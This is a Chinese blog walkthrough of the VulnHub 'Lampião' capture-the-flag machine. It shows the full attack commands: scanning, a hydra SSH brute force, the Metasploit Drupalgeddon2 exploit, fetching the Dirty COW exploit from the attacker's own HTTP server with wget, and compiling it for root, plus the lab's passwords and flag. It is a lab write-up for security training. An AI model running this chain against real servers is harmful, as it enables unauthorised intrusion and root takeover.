vlunhub-Lampiao靶机通关(超详细)

已于 2024-01-03 21:22:39 修改
阅读量568 收藏 11
点赞数 12
分类专栏: vlunhub 文章标签: 网络安全 web安全
于 2024-01-03 21:20:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53730939/article/details/135373104
版权

目录

准备工作

主机发现

全端口扫描

信息枚举

爆破网站目录

获取密码字典

hydra爆破

登录ssh

提权

MSF提权

脏牛提权

登录root-ssh

准备工作

靶机ip:192.168.198.138
kali:192.168.168.128

靶机地址:

Lampião: 1 ~ VulnHub

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! "Lampião 1".

Get root!

Level: Easy

主机发现

arp-scan 192.168.198.0/24

全端口扫描

nmap -p- 192.168.198.138

目标计算机上有三个可用的开放端口22、80、1898端口

信息枚举

http://192.168.198.138:1898/ -> Read more 发现改页面信息:
http://192.168.198.138:1898/?q=node/2

页面发现:

audio.m4a:语音获得用户名:tiago

qrc.png:图片二维码扫描获得信息,需要爆破

爆破网站目录

dirb http://192.168.198.138:1898

获得url:http://192.168.198.138:1898/robots.txt

继续枚举获得:http://192.168.198.138:1898/CHANGELOG.txt

发现是:Drupal 7.54, 2017-02-01

获取密码字典

先利用cewl来生成一份结合网站目标的社工性质的密码字典

cewl http://192.168.198.138:1898/ -w Lampiao.txt

hydra爆破

使用之前语音获得的用户名:tiago进行ssh爆破

hydra -l tiago -P Lampiao.txt 192.168.198.138 ssh

用户: tiago

密码: Virgulino

登录ssh

ssh tiago@192.168.198.138

发现是低权限用户,需要提权!

提权

MSF提权

msfconsole
search  Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rport 1898
set rhosts 192.168.198.138
exploit
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

通过漏洞渗透进入系统,但是获得的是低权限用户,和前面ssh登陆的tiago用户权限类似

脏牛提权

下一步要找到反弹shell获取root权限,通过LES(Linux 权限提升审计工具)来检测给定 Linux 内核/基于 Linux 的机器的安全缺陷

下载链接:https://github.com/The-Z-Labs/linux-exploit-suggester 

python -m http.server 8081
tiago@lampiao:~$ wget http://192.168.198.128:8081/les.sh
tiago@lampiao:~$ chmod +x les.sh
tiago@lampiao:~$ ./les.sh

这里我们使用40847提权

1、searchsploit dirty
使用:Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privile | linux/local/40847.cpp
2、cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/

继续开启本地pthon服务,然后把40847.cp发送到靶机上:

3、python -m http.server 8081
4、wget http://192.168.198.128:8081/40847.cpp
5、g++ -Wall -pedantic -O2 -std=c++11 -pthread -o Lampiao 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
6、./Lampiao

Root password is: dirtyCowFun

获得root用户密码!

登录root-ssh

ssh root@192.168.198.138
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366

此刻已成功拿到flag!!!

hh_y
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vlunhub靶机一Kioptrix
willow_liang的博客
01-29 1170
Kioptrix Level 1 (#1) 1.查找靶机ip地址 1.使用nbtscan查找
vlunhub- BoredHackerBlog Social Network
GALi_233的博客
08-21 688
Description Leave a message is a new anonymous social networking site where users can post messages for each other. They’ve assigned you to test their set up. They do utilize docker containers. You can conduct attacks against those too. Try to see if you
2、Lampiao-靶机-百个项目计划
最新发布
Labi的博客
04-26 313
学习内容nmap扫描、dirb目录爆破、cewl爬取网站关键字、hydra爆破、脏牛提权。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2334
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
VlunHub_Five86-1
qq_45434762的博客
06-24 212
主机发现使用nmap扫描网段,找到目标机器的IP地址nmap 192.168.169.1-254 端口扫描使用nmap探测目标主机开放端口nmap -A 192.168.169.172k...
Lazysysadmin vlunhub
weixin_43202965的博客
02-29 154
使用nmap进行主机探测 目标开放了80、22、139、445、3306、6667 访问了一下80 提示togie可能是个用户名 使用msf中的smb_enumshares对smb共享目录进行探测,发现printf、share、share、share、IPC$ 尝试访问smb,成功访问share$ 收集一波信息,目标站点是个wordpress站点 一个密码 Mysql连接的账号密码 对目标目录进行...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
vulnhub靶机实战-My-cmsms靶机
09-29
本文档将针对vulnhub靶机实战-My-cmsms靶机详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中的主机。常见的主机发现方法有...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
1-Vlunhub--GIGACHAD
weixin_45873667的博客
06-08 430
前言:小菜鸟在努力 也是学渗透不久,慢慢了解深入,坚持每天能够弄明白一个靶机Vlunhub–GIGACHAD 首先因为虚拟机无法分配IP需要我们手动 配置网卡: 将虚拟机打开: 按e进入编辑模式, 这里显示的网卡是ens33 修改 网卡:vi /etc/network/interfaces 将网络切换为nat模式,获得IP:192.168.159.155 配置好之后重新启动 开始复现: nmap -sn -vv -n -PE 192.168.159.0/24 --min-rate=2000 -s
VulnHub-toppo
热门推荐
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
vlunhub之potato
鲨鱼辣椒的博客
05-31 2613
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 发现漏洞 尝试爆破 登录 提权 查看内核版本找到合适的poc 信息搜集 扫描网段 nmap -sP 192.168.179.0/24 扫描端口 nmap -sS -sV -p- -v 192.168.179.129 扫描网站目录 dirb http://192.168.179.129/ 发现漏洞 挨个进这几个页面去看一看,只知道一个phpinfo界面,找到一个算是敏感信息泄露的漏洞,其他的就没有什么.
vlunhub之tomato
鲨鱼辣椒的博客
05-31 360
目录 信息搜集 扫描网段确定主机IP地址 ​扫描该IP地址开放端口以及服务 ​发现漏洞 利用IP地址登录 ​尝试扫描出的端口 爆破网站目录 发现敏感文件泄露 利用漏洞 尝试getsell 利用php反弹shell 权限提升 在该目录下开启http服务 在getshell里下载该文件 信息搜集 扫描网段确定主机IP地址 扫描该IP地址开放端口以及服务 nmap -A -p- 192.168.179.128 发现漏洞 利用IP地址登录 尝试扫描出的端口 只有88
vulnhub chakravyuh
底层社会中的弱智
03-17 547
扫描局域网靶机 目标为192.168.2.8 扫描端口: 分析: 22端口为ssh openssh 7.6p1版本 暂无漏洞 80端口http服务 apache中间件 65530端口为ftp服务存在匿名登陆 使用匿名登录ftp 下载arjun.7z 存在解压密码 尝试破解 使用到的脚本文件 https://github.com/truongkma/ctf-t...
Me and My Girlfriend Vlunhub实践
weixin_43202965的博客
02-25 507
场景: kali渗透机器 Me and My Girlfriend 目标机器 网络: 均使用NAT(不把目标机器视为内网机器,固均使用nat网络) 使用VMware加载 Tip:使用kali进行ifconfig查看NAT网段(10.10.10.0/24) 一、目标主机信息收集: 1. 确定目标主机IP 使用kali的nmap对网段进行扫描 命令:nmap 10.10.10.0/24 -sn --e...
VulnHub靶场LupinOne
I夜白
02-01 4985
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
Vulnhub篇Tomato
千寻的博客
01-12 645
环境搭建 下载地址: https://www.vulnhub.com/entry/tomato-1,557/ kali 192.168.232.140 tomato: 192.168.232.175 win10 :192.168.232.171 第一部分 信息收集 第一步 扫描,发现主机 nmap -sP 192.168.232.0/24 arp-scan -l 第二步 扫描开放的端口 nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值